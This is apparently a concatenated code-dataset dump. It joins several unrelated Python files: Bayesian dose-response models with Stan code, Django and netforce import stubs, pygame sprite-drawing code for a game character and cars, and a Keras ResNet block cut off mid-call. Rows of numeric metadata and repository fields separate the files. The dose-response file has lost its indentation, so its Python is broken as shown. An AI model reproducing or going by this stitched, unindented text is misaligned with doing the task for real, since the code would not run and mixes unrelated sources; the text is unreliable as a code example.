a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (a + (1.-a) * stats.norm.cdf(c + b * np.log(dose)))
class Probit(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real a;
real<lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],normal_cdf(a+b*dnorm[i],0,1));
}
"""
LATEX_EQUATION = r'$f(dose) = \Phi(a+b \times dose)$' # noqa
def get_priors(self):
return {
'p_a': [-50, 50],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = stats.norm.cdf(a[i] + b[i] * doses)
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = stats.norm.cdf(a[i] + b[i] * doses)
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return stats.norm.cdf(kw['a'] + kw['b'] * x)
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return (stats.norm.ppf((bmr + (1 - bmr) * stats.norm.cdf(a))) - a) / b
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return (stats.norm.ppf(bmr + stats.norm.cdf(a)) - a) / b
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return stats.norm.cdf(a + b * dose)
class QuantalLinear(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real <lower=0, upper=1> a;
real <lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*(1-exp(-b*dnorm[i])));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-b \times dose})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i] + (1 - a[i]) * (1 - np.exp(-b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i] + (1 - a[i]) * (1 - np.exp(-b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a'])*(1 - np.exp(- kw['b'] * x))
def extra_risk(self, bmr):
b = self.parameters['b']
return np.log(1-bmr)/(-b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log(1-bmr/(1-a))/(-b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return a+(1-a)*(1-np.exp(-b*dose))
class Multistage2(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=0> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*(1-exp(-b*dnorm[i]-c*(dnorm[i]^2))));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-b \times dose -c \times dose^{2}})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 100],
'p_c': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-b[i]*doses-c[i]*doses**2)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-b[i]*doses-c[i]*doses**2)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a'])*(1 - np.exp(- kw['b'] * x - kw['c'] * x**2))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return (-b+np.sqrt(b**2-4*c*np.log(1-bmr)))/(2*c)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (-b+np.sqrt(b**2-4*c*np.log(1-bmr/(1-a))))/(2*c)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return a+(1-a)*(1-np.exp(-b*dose-c*dose**2))
class Weibull(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a+(1-a)*(1-exp(-c*(dnorm[i])^b)));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times (1 - e^{-c \times dose^{b}})$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [0, 50],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-c[i]*(doses**b[i]))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])*(1-np.exp(-c[i]*(doses**b[i]))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a']) * (1 - np.exp(- kw['c'] * (x**kw['b'])))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp(np.log(np.log((1-bmr*(1-a)-a)/(1-a))/(-c))/b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp(np.log(np.log((1-bmr-a)/(1-a))/(-c))/b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return a+(1-a)*(1-np.exp(-c*(dose**b)))
class Gamma(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0,upper=1> a;
real <lower=pwr_lbound> b;
real <lower=0> c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)*gamma_cdf(c*dnorm[i],b,1));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times CumGamma(c \times dose, b)$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [0, 100],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i] + (1 - a[i]) * stats.gamma.cdf(c[i] * doses, b[i]))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i] + (1 - a[i]) * stats.gamma.cdf(c[i] * doses, b[i]))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return kw['a'] + (1 - kw['a']) * stats.gamma.cdf(kw['c'] * x, kw['b'])
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return stats.gamma.ppf(bmr, b) / c
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return stats.gamma.ppf(bmr / (1 - a), b) / c
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.array(a + (1 - a) * stats.gamma.cdf(c * dose, b))
class DichotomousHill(Dichotomous):
RESAMPLE_MAX_THRESHOLD = 0.05
PARAMETERS = ('a', 'b', 'c', 'g')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
real p_g[2]; // prior for g
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
real <lower=0, upper=1> g;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
g ~ uniform (p_g[1], p_g[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a * g + (a - a * g)/(1 + exp(-c - b * log(dno0norm[i]))));
}
"""
LATEX_EQUATION = r'$f(dose) = a \times g + \frac{a - a \times g}{1 + e^{-c - b \times \log(dose)}}$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
'p_g': [0, 1],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = a[i] * g[i] + (a[i] - a[i] * g[i]) / (1 + np.exp(-c[i] - b[i] * np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
g = samples[3, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = a[i] * g[i] + (a[i] - a[i] * g[i]) / (1 + np.exp(-c[i] - b[i] * np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] * kw['g'] + \
(kw['a'] - kw['a'] * kw['g']) / \
(1 + np.exp(-kw['c'] - kw['b'] * np.log(x)))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return np.exp((np.log(
(bmr - a + a * g - bmr * a * g) /
(bmr * (a * g - 1.))) + c) / (-b))
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return np.exp((np.log((bmr - a + a * g) / (-bmr)) + c) / (-b))
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
g = self.parameters['g']
return a * g + (a - a * g) / (1 + np.exp(-c - b * np.log(dose)))
| 31.937819 | 112 | 0.486802 | 4,382 | 31,331 | 3.395938 | 0.036741 | 0.091257 | 0.033062 | 0.038707 | 0.924871 | 0.915261 | 0.902224 | 0.901552 | 0.88744 | 0.885156 | 0 | 0.026354 | 0.342377 | 31,331 | 980 | 113 | 31.970408 | 0.695884 | 0.005362 | 0 | 0.804266 | 0 | 0.02133 | 0.264871 | 0.011171 | 0 | 0 | 0 | 0.00102 | 0 | 1 | 0.095358 | false | 0 | 0.005019 | 0.02133 | 0.239649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e720b041a9849d792b935dc307f7063ba052273c | 183 | py | Python | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/views/__init__.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | from .programs_view_test_case import ProgramsViewTestCase
from .cutting_job_view_test_case import CuttingJobsViewTestCase
from .globo_play_view_test_case import GloboPlayViewTestCase
| 45.75 | 63 | 0.918033 | 23 | 183 | 6.826087 | 0.565217 | 0.152866 | 0.229299 | 0.343949 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065574 | 183 | 3 | 64 | 61 | 0.918129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e7da21a0923f8ab1d8b9acc280daeaaf3ed08990 | 94 | py | Python | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 27 | 2015-09-30T23:53:30.000Z | 2021-06-07T04:56:25.000Z | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 191 | 2015-10-08T11:46:30.000Z | 2019-11-14T02:24:36.000Z | netforce_support/netforce_support/models/__init__.py | nfco/netforce | 35252eecd0a6633ab9d82162e9e3ff57d4da029a | [
"MIT"
] | 32 | 2015-10-01T03:59:43.000Z | 2022-01-13T07:31:05.000Z | from . import issue
from . import issue_type
from . import report_issue
from . import message
| 18.8 | 26 | 0.787234 | 14 | 94 | 5.142857 | 0.428571 | 0.555556 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 94 | 4 | 27 | 23.5 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
99b052f6145f8b03d414080781a87542c2e77237 | 45 | py | Python | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | 1 | 2021-07-22T05:16:13.000Z | 2021-07-22T05:16:13.000Z | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | null | null | null | lib/lib/__init__.py | trouleau/noisy-hawkes-cumulants | a183a766807a714ca4338f09249d4ddc4e9a11a7 | [
"MIT"
] | null | null | null | from . import simulation
from . import utils
| 15 | 24 | 0.777778 | 6 | 45 | 5.833333 | 0.666667 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 25 | 22.5 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
99b66d943379fba5eec61285f6179516eb2592d3 | 4,613 | py | Python | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | centre.py | SkYNewZ/1DEV | 9f75115afae45c1f2b19f838adf8f6eacdd3e1d8 | [
"MIT"
] | null | null | null | # coding=utf-8
import pygame, sys
from globales import *
from pygame.locals import *
def afficher_perso(direction, locomotion, position, modele_voiture):
coord_centre_perso_horizontal = [1500//2-20, 825//2-65]
coord_centre_perso_vertical = [1500//2-30, 825//2-55]
#coordonnées du (centre de la map)-x/2; (centre de la map)-y/2
#voiture
if locomotion == 2:
#monter
if direction == 1:
fenetre.blit(tab_voitures[modele_voiture][0], ((1500//2)-35, (825//2-35)-67))
#descendre
if direction == 2:
fenetre.blit(tab_voitures[modele_voiture][1], ((1500//2)-35, (825//2-35)-67))
#gauche
if direction == 3:
fenetre.blit(tab_voitures[modele_voiture][2], ((1500//2)-67, (825//2-35)-35))
#droite
if direction == 4:
fenetre.blit(tab_voitures[modele_voiture][3], ((1500//2)-67, (825//2-35)-35))
##a pied
if locomotion == 1:
#gauche
if direction == 3:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][18], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][19], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][20], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][21], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][22], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][23], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
#droite
if direction == 4:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][12], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][13], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][14], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][15], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][16], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][17], (coord_centre_perso_horizontal[0], coord_centre_perso_horizontal[1]))
#haut
if direction == 1:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][6], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][7], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][8], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][9], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][10], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][11], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
#bas
if direction == 2:
if position == 1 or position == 2:
fenetre.blit(tab_perso[armed[0]][0], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 3 or position == 4:
fenetre.blit(tab_perso[armed[0]][1], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 5 or position == 6:
fenetre.blit(tab_perso[armed[0]][2], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 7 or position == 8:
fenetre.blit(tab_perso[armed[0]][3], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 9 or position == 10:
fenetre.blit(tab_perso[armed[0]][4], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
if position == 11 or position == 12:
fenetre.blit(tab_perso[armed[0]][5], (coord_centre_perso_vertical[0], coord_centre_perso_vertical[1]))
#DEBUG
# pygame.draw.circle(fenetre, (255, 0,0), (1500//2, 825//2-35), 5) | 46.59596 | 111 | 0.710817 | 718 | 4,613 | 4.310585 | 0.107242 | 0.177706 | 0.258481 | 0.210016 | 0.836511 | 0.836187 | 0.790953 | 0.771567 | 0.771567 | 0.771567 | 0 | 0.0725 | 0.132885 | 4,613 | 99 | 112 | 46.59596 | 0.70125 | 0.044006 | 0 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014706 | false | 0 | 0.044118 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
99dc8febb7d61c9b3364ee9bbdf5c0a5557eff22 | 11,974 | py | Python | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 3,967 | 2018-06-19T04:39:09.000Z | 2022-03-31T10:57:53.000Z | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 3,494 | 2018-06-21T07:09:58.000Z | 2022-03-31T19:44:51.000Z | docs/examples/use_cases/tensorflow/resnet-n/resnet_model.py | cyyever/DALI | e2b2d5a061da605e3e9e681017a7b2d53fe41a62 | [
"ECL-2.0",
"Apache-2.0"
] | 531 | 2018-06-19T23:53:10.000Z | 2022-03-30T08:35:59.000Z | import tensorflow as tf
from tensorflow.keras import backend
from tensorflow.keras import initializers
from tensorflow.keras import models
from tensorflow.keras import regularizers
from nvutils import image_processing
layers = tf.keras.layers
L2_WEIGHT_DECAY = 1e-4
BATCH_NORM_DECAY = 0.9
BATCH_NORM_EPSILON = 1e-5
def _gen_l2_regularizer(use_l2_regularizer=True):
return regularizers.l2(L2_WEIGHT_DECAY) if use_l2_regularizer else None
def identity_block(input_tensor,
kernel_size,
filters,
stage,
block,
use_l2_regularizer=True):
"""The identity block is the block that has no conv layer at shortcut.
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
